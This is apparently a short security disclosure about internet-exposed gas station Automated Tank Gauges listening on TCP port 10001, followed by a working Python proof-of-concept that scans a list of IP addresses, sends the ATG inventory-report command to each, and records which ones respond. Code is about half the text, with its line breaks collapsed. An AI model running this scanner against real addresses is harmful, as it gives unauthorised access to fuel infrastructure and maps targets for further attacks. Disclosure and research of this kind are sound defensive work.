Automated Tank Gauge (ATG) Remote Configuration Disclosure

In 2015, HD Moore, the creator of Metasploit, published an article disclosing over 5,800 gas station Automated Tank Gauges (ATGs) which were publicly accessible. Besides monitoring for leakage, these systems are also instrumental in gauging fluid levels, tank temperature, and can alert operators when tank volumes are too high or have reached a critical low. ATGs are utilized by nearly every fueling station in the United States and tens of thousands of systems internationally. They are most commonly manufactured by Veeder-Root, a supplier of fuel dispensers, payment systems, and forecourt merchandising. For remote monitoring of these fuel systems, operators will commonly configure the ATG serial interface to an internet-facing TCP port (generally set to TCP 10001). This script reads the Get In-Tank Inventory Report from TCP/10001 as a proof of concept to demonstrate the arbitrary access.

#!/usr/bin/env python3 import timeimport socket            with open("/tmp/ATG_SCAN.txt",'r') as atg_file:    for line in atg_file.read().splitlines():        try:            atg_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)            port = 10001            search_str = 'IN-TANK INVENTORY'                           msg = str('\x01' + 'I20100' + '\n').encode('ascii')            atg_socket.connect((line, port))            atg_socket.send(msg)            time.sleep(.25)            response = atg_socket.recv(1024).decode()            if search_str in response:                with open("/tmp/ATG_DEVICES.txt", 'a') as file2:                    file2.write(line + "\t ->\tATG Device\n")            else:                continue            atg_socket.close()           except:            pass atg_file.close()